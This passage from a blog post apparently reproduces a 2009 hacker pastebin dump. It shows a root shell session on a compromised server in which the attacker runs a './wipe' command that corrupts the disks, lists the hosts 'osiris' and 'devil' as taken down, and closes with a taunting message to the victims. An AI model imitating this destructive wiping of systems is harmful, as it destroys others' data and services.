  633. megacashzone.com: megacash
  634. visit4cash.net: visit4ca
  635. seanone.com: seanonec
  636. backup2.ssanz.net: backup2
  637. *: nobody
  638.  
  639. sh-3.2# df -h
  640. Filesystem            Size  Used Avail Use% Mounted on
  641. /dev/sda3              31G  7.5G   22G  26% /
  642. /dev/sdb1             452G   35G  394G   9% /home
  643. /dev/sda1              99M   23M   72M  24% /boot
  644. tmpfs                 495M  4.0K  495M   1% /dev/shm
  645. /usr/tmpDSK           485M   14M  446M   3% /tmp
  646.  
  647. sh-3.2# who
  648. root     pts/0        2009-07-03 20:18 (125.238.144.224)
  649.  
  650. sh-3.2# ./wipe
  651.  
  652. sh-3.2# df -h
  653. Filesystem            Size  Used Avail Use% Mounted on
  654. /dev/sda3              64Z   64Z   24G 100% /
  655. /dev/sdb1              64Z   64Z  417G 100% /home
  656. /dev/sda1              16Z   16Z   77M 100% /boot
  657. tmpfs                 495M  4.0K  495M   1% /dev/shm
  658. /usr/tmpDSK           485M   14M  446M   3% /tmp
  659.  
  660. sh-3.2# exit
  661. exit
  662.  
  663.  
  664. -----------------------------------
  665.  
  666. osiris                  [ DOWN ]
  667. devil                   [ DOWN ]
  668.  
  669. -----------------------------------
  670.  
  671. Once again, practice what you preach. Don't claim to be something you're not.
  672. Most importantly, don't go after us. We're not the problem. What you say does
  673. not align AT ALL with what you actually do with your servers.
  674.  
  675. Fix that first, you dig?
  676.  
  677. ~ There will always be no way out.


The pastebin: http://pastebin.com/f7067caf.
Bookmark this post with:
Posted by Chuck at 9:04 PM
Labels: , ,
blog comments powered by Disqus
Subscribe to: Post Comments (Atom)